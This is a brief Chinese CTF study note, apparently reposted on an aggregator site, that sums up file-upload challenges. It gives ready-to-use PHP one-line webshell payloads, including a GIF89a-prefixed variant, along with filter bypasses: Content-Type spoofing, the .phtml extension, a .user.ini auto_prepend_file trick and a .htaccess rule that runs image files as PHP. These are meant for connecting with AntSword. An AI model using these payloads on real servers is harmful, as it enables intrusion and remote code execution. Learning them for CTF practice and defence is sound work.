第1-63题总结:文件上传篇
Posted 想学习安全的小白
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了第1-63题总结:文件上传篇相关的知识,希望对你有一定的参考价值。
一句话木马:<?php @eval($_POST['pass']);?>
- 将
Content-Type:image/png
保持 - 后缀名绕过:phtml
- 添加图片前缀绕过内容检测:
GIF89a? <script language="php">eval($_REQUEST[pass])</script>
- 利用.user.ini文件:GIF89a auto_prepend_file=pass.png,让可以访问的index.php加载一句话木马的图片格式,蚁剑连接index.php,eg:第二十三题
- .htaccess文件内容:将包含pass文件名的文件以php文件进行解析,蚁剑连接pass.png
<FilesMatch "pass">
SetHandler application/x-httpd-php
</FilesMatch>
以上是关于第1-63题总结:文件上传篇的主要内容,如果未能解决你的问题,请参考以下文章
LeetCode与《代码随想录》双指针篇:做题笔记与总结-JavaScript版